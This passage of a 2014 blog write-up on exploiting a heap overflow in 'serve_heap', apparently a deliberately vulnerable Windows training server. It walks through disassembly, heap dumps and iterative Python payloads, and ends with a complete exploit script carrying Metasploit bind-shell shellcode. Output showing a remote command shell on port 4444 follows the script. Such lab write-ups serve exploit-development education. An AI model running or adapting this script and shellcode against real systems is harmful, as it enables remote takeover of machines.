    .text:004012CC mov     [esp+298h+param2], 0 ; dwInitialSize
    .text:004012D4 mov     [esp+298h+param1], 40000h ; flOptions
    .text:004012DB call    _HeapCreate@12  ; HeapCreate(x,x,x)
    .text:004012E0 sub     esp, 0Ch
    .text:004012E3 mov     ds:_hHeap, eax
    

    With the flOptions set to 0x00040000 or HEAP_CREATE_ENABLE_EXECUTE, any allocations made using the private heap will be readable, writeable, and most importantly executable. Thus, the private heap is the ideal location for the shellcode.

    The only way a program can request a chunk on the private heap is through the use of the HeapAlloc function call. The standard malloc call will use the application's default heap that is not executable. Let's use IDA's xrefs view to find all references to the HeapAlloc:

    We can immediately eliminate Function 3, because it can't be used to actually copy data to the heap. This leaves us with either Function 2 or Function 4. All calls to Function 2 limit the maximum size copied to the heap to 100 bytes which is not ideal for any decently sized shellcode. This leaves us with Function 4. There are two commands which can be used to call Function 4: STATS and HTER. Once again STATS can only supply a 120 byte buffer to the Function 4, leaving us with HTER.

    In order to inject shellcode using HTER we must specially craft it to survive the string to hex conversion. Below is the relevant snippet from the command:

    .text:00402256 mov     [esp+5A8h+param3], 2 ; Size
    .text:0040225E mov     eax, [ebp+offset]
    .text:00402264 add     eax, [ebp+buf1]
    .text:00402267 mov     [esp+5A8h+param2], eax ; Src
    .text:0040226B lea     eax, [ebp+tempstr2] ; copy two bytes
    .text:00402271 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402274 call    _memcpy
    .text:00402279 mov     [esp+5A8h+param3], 16 ; Radix
    .text:00402281 mov     [esp+5A8h+param2], 0 ; EndPtr
    .text:00402289 lea     eax, [ebp+tempstr2]
    .text:0040228F mov     [esp+5A8h+param1], eax ; Str
    .text:00402292 call    _strtoul        ; str -> unsigned long
    

    Let's modify the very first proof of concept payload to send the shellcode to the application:

    shellcode = "cc"*200
    
    # 0) Inject shellcode
    payload = " deadbeef" + "20" + "90"*(2039 - len(shellcode)/2) + shellcode
    s.sendall("HTER " + payload)
    print "%s" % s.recv(1024)
    

    Notice that instead of using the \xCC format to represent bytes, we are using a two byte string "CC" which will be converted by the application. We must also compensate for an extra byte being chopped off (recall the off-by-one in the offset parameter) with an extra space before "deadbeef". I have also included the string "20" which will be converted to the whitespace separator used by the strtok function. Incidentally, we must not use the whitespace character anywhere in the shellcode, because strtok will replace that byte to zero which would cut off the shellcode. Finally, the reason for the number 2039 is to precisely populate the 2048 tempbuf: 2039 bytes for nops and shellcode, 4 bytes for 0xdeadbeef, and finally one extra byte for the space separator used by the tokenizer. This should leave us with additional 4 null terminating bytes at the end of the buffer to properly terminate the loop.

    Enough theory, let's place a breakpoint at the call to Function 4 from HTER (address 0x004022E5) and observe the two 2048 byte buffers on the heap:

    You can dump information about the two buffers using heaper:

    >!heaper ac 490000 -f busy
    
    --------------------------------------------------------------
    Dumping chunks @ heap address: 0x00490000
    Analyzing 1 segments
    - 0x00490000
    --------------------------------------------------------------
    Note: chunks on the lookaside will appear BUSY
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    (+) BUSY chunk @ 0x00490000
    0x00000000
        -> size: 0x00000640  (8 * 0x00c8 = 0x0640, decimal: 1600)
        -> prevsize: 0x00000000 (0000)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490640
    0x00000000
        -> size: 0x00000040  (8 * 0x0008 = 0x0040, decimal: 64)
        -> prevsize: 0x00000640 (00c8)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00490680
    0x00000000
        -> size: 0x00001808  (8 * 0x0301 = 0x1808, decimal: 6152)
        -> prevsize: 0x00000040 (0008)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00491e88
    0x00000000
        -> size: 0x00000800  (8 * 0x0100 = 0x0800, decimal: 2048)
        -> prevsize: 0x00001808 (0301)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    (+) BUSY chunk @ 0x00492688
    0x00000000
        -> size: 0x00000800  (8 * 0x0100 = 0x0800, decimal: 2048)
        -> prevsize: 0x00000800 (0100)
        -> flags: 0x0001 (B)
    --------------------------------------------------------------
    

    After surviving the conversion and tokenization, the strcpy will be called with a destination set to the chunk on the executable heap as illustrated in the memory snapshot after the copy operation:

    Great! The specially crafted shellcode was correctly converted and injected unmolested. Naturally only the second allocation, 0x00492688, will contain the shellcode. The first allocation is simply set to zero. Using this technique, we can inject around 2000 bytes to the executable heap which should be sufficient for any shellcode with a healthy dose of NOPs for reliability.

    Increasing reliability

    We have solved many problems ranging from heap manipulations, to bypassing DEP, to finding a reliable pointer to overwrite. Now let's put the finishing touch on the exploit by making it reliable.

    Let's insert the shellcode injection payload prior to smashing the Lookaside list as follows:

    target = pack("I",0x004061b0) # 0x004061b0 - memcpy
    scaddr = pack("I",0x004926b0) # shellcode address
    
    print "%s" % s.recv(1024)
    shellcode = "cc"*200
    
    # 0) Inject shellcode
    payload = " deadbeef" + "20" + "90"*(2039 - len(shellcode)/2) + shellcode
    s.sendall("HTER " + payload)
    print "%s" % s.recv(1024)
    
    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 3) Overflow chunk A and overwrite chunk B's flink
    s.sendall("GTER " + "A"*8 + "B"*8 + target)
    print "%s" % s.recv(1024)
    
    # 4) Allocate chunk B and chunk C. Overwrite the target.
    s.sendall("STATS " + scaddr)
    print "%s" % s.recv(1024)
    
    # 5) Trigger the shellcode
    s.sendall("HELP")
    print "%s" % s.recv(1024)
    

    Running the above payload against the serve_heap will result in an access violation. While debugging you will notice a strange memory allocation:

    The KSTET parameter used for the call to Function 2 appears to contain a chunk of the "encoded" shellcode. If we look back at the disassembly above, the receiving buf1 is continuously reused without consistently zeroing it out. As a result, any previously received buffers will persist in memory and potentially corrupt your carefully crafted commands.

    We can fix this issue by adding terminating null bytes to the affected commands:

    target = pack("I",0x004061b0) # 0x004061b0 - memcpy
    scaddr = pack("I",0x004926b0) # shellcode address
    
    print "%s" % s.recv(1024)
    
    shellcode = "\xcc"*200
    shellcode = hexlify(shellcode) # encode shellcode
    
    # 0) Spray the shellcode
    for i in range(20):
        payload = " deadbeef" + "20" + "90"*(2039 - len(shellcode)/2) + shellcode
        s.sendall("HTER " + payload)
        print "%s" % s.recv(1024)
    
    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8 + "\x00")
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8 + "\x00")
    print "%s" % s.recv(1024)
    
    # 3) Overflow chunk A and overwrite chunk B's flink
    s.sendall("GTER " + "A"*8 + "B"*8 + target)
    print "%s" % s.recv(1024)
    
    # 4) Allocate chunk B and chunk C. Overwrite the target.
    s.sendall("STATS " + scaddr)
    print "%s" % s.recv(1024)
    
    # 5) Trigger the shellcode
    s.sendall("HELP" + "\x00")
    

    Notice the addition of a heap spray which will result in 20 2048-byte heap chunks containing the shellcode. This was done to account for differences in the base address of private heaps. You can increase exploit reliability by increasing the number and adjusting the shellcode address to a more stable address. Running the above payload produces the following output in the debugger:

    We have successfully corrupted the Lookaside list, overwrote an IAT pointer, injected shellcode at a reliable location, and finally redirected the execution flow to the shellcode. The execution stopped at the first instance of the int 3 (\xcc) instruction after sliding down several hundred NOPs.

    Finalizing the Exploit

    At this point we can plug in a real shellcode in-place of the stub:

    #!/usr/bin/env python
    #
    # serve_heap heap overflow exploit
    #    by iphelix [at] thesprawl.org
    # 
    # Tested on Windows XP SP3 with DEP set to AlwaysOn
    
    import sys, socket
    from struct import pack
    from binascii import hexlify
    
    HOST = sys.argv[1]
    PORT = 9999
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    
    target = pack("I",0x004061b0) # 0x004061b0 - memcpy
    scaddr = pack("I",0x004926b0) # shellcode address
    
    # windows/shell_bind_tcp - 368 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
    # EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
    # BADCHARS='\x00\x20'
    shellcode = (
    "\xba\x3b\xaf\x2d\xf2\xda\xd9\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
    "\x56\x31\x56\x13\x03\x56\x13\x83\xee\xc7\x4d\xd8\x0e\xdf\x1b"
    "\x23\xef\x1f\x7c\xad\x0a\x2e\xae\xc9\x5f\x02\x7e\x99\x32\xae"
    "\xf5\xcf\xa6\x25\x7b\xd8\xc9\x8e\x36\x3e\xe7\x0f\xf7\xfe\xab"
    "\xd3\x99\x82\xb1\x07\x7a\xba\x79\x5a\x7b\xfb\x64\x94\x29\x54"
    "\xe2\x06\xde\xd1\xb6\x9a\xdf\x35\xbd\xa2\xa7\x30\x02\x56\x12"
    "\x3a\x53\xc6\x29\x74\x4b\x6d\x75\xa5\x6a\xa2\x65\x99\x25\xcf"
    "\x5e\x69\xb4\x19\xaf\x92\x86\x65\x7c\xad\x26\x68\x7c\xe9\x81"
    "\x92\x0b\x01\xf2\x2f\x0c\xd2\x88\xeb\x99\xc7\x2b\x78\x39\x2c"
    "\xcd\xad\xdc\xa7\xc1\x1a\xaa\xe0\xc5\x9d\x7f\x9b\xf2\x16\x7e"
    "\x4c\x73\x6c\xa5\x48\xdf\x37\xc4\xc9\x85\x96\xf9\x0a\x61\x47"
    "\x5c\x40\x80\x9c\xe6\x0b\xcd\x51\xd5\xb3\x0d\xfd\x6e\xc7\x3f"
    "\xa2\xc4\x4f\x0c\x2b\xc3\x88\x73\x06\xb3\x07\x8a\xa8\xc4\x0e"
    "\x49\xfc\x94\x38\x78\x7c\x7f\xb9\x85\xa9\xd0\xe9\x29\x01\x91"
    "\x59\x8a\xf1\x79\xb0\x05\x2e\x99\xbb\xcf\x59\x9d\x75\x2b\x0a"
    "\x4a\x74\xcb\xbd\xd6\xf1\x2d\xd7\xf6\x57\xe5\x4f\x35\x8c\x3e"
    "\xe8\x46\xe6\x12\xa1\xd0\xbe\x7c\x75\xde\x3e\xab\xd6\x73\x96"
    "\x3c\xac\x9f\x23\x5c\xb3\xb5\x03\x17\x8c\x5e\xd9\x49\x5f\xfe"
    "\xde\x43\x37\x63\x4c\x08\xc7\xea\x6d\x87\x90\xbb\x40\xde\x74"
    "\x56\xfa\x48\x6a\xab\x9a\xb3\x2e\x70\x5f\x3d\xaf\xf5\xdb\x19"
    "\xbf\xc3\xe4\x25\xeb\x9b\xb2\xf3\x45\x5a\x6d\xb2\x3f\x34\xc2"
    "\x1c\xd7\xc1\x28\x9f\xa1\xcd\x64\x69\x4d\x7f\xd1\x2c\x72\xb0"
    "\xb5\xb8\x0b\xac\x25\x46\xc6\x74\x55\x0d\x4a\xdc\xfe\xc8\x1f"
    "\x5c\x63\xeb\xca\xa3\x9a\x68\xfe\x5b\x59\x70\x8b\x5e\x25\x36"
    "\x60\x13\x36\xd3\x86\x80\x37\xf6"
    )
    shellcode = hexlify(shellcode) # encode shellcode
    
    print "%s" % s.recv(1024)
    
    # 0) Spray the shellcode
    for i in range(20):
        payload = " deadbeef" + "20" + "90"*(2039 - len(shellcode)/2) + shellcode
        s.sendall("HTER " + payload)
        print "%s" % s.recv(1024)
    
    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8 + "\x00")
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8 + "\x00")
    print "%s" % s.recv(1024)
    
    # 3) Overflow chunk A and overwrite chunk B's flink
    s.sendall("GTER " + "A"*8 + "B"*8 + target)
    print "%s" % s.recv(1024)
    
    # 4) Allocate chunk B and chunk C. Overwrite the target.
    s.sendall("STATS " + scaddr)
    print "%s" % s.recv(1024)
    
    # 5) Trigger the shellcode
    s.sendall("HELP" + "\x00")
    
    s.close()
    

    After running the above exploit, you should be able to see port 4444 opened with the shellcode listening on the other end:

    C:\>netstat -an
    
    Active Connections
    
      Proto  Local Address          Foreign Address        State
      TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
      TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
      TCP    0.0.0.0:2869           0.0.0.0:0              LISTENING
      TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
      TCP    0.0.0.0:9999           0.0.0.0:0              LISTENING
      :
      :
    
    C:\>telnet localhost 4444
    
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\serve_heap>
    

    External Links and References

    Special Note

    Thank you Steven Seeley (mr_me) both for the fun challenge and sharing your research on heap exploitation. You rock!

    Published on June 18th, 2014 by iphelix

    sprawlsimilar

    corelan - integer overflows - exercise solution

    A solution to the exercise in the Corelan article Root Cause Analysis - Integer Overflows on exploiting integer and heap overflows. The solution illustrates massaging the heap into a vulnerable state by corrupting the Windows front-end allocator and finally exploiting it to gain arbitrary code execution. Read more.

    open security training - introduction to software exploits - uninitialized variable overflow

    Open Security Training's Introduction to Software Exploits course has a number of vulnerability examples designed to illustrate unconventional exploitation techniques. One such example is an uninitialized variable condition which may be exploitable under certain conditions. The following walkthrough goes into the exact exploitation steps for this class of vulnerabilities. Read more.

    01 oct
    2014
    exodus - vuln-dev - master class

    A few weeks ago I had a great pleasure of studying at a week-long training taught by Exodus Intelligence. The Vulnerability Development - Master Class was taught by Aaron Portnoy, Zef Cekaj, and Peter Vreugdenhil. The class had an excellent presentation of two complementary yet unique subjects of vulnerability discovery and exploit development primarily under Windows environment. The instructors are truly masters of their field which was reflected in the great quality and depth of the material.

    While it is still fresh in my mind, I would like to share with you some of the notes on the covered subjects, the recommended prerequisites, and tips on how to get the most out of this very intensive training. Read more.

    exploit exercises - protostar - final levels

    Exploit Exercises' Protostar wargame includes a number of carefully prepared exercises to help hone your basic exploitation skills. The final portion of the wargame combines Stack, Format String, Heap, and Network exploitation techniques into three excellent challenges to help solidify knowledge gained from previous exercises. Read more.


    sprawlcomments

    All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.

    π
    ///\oo/\\\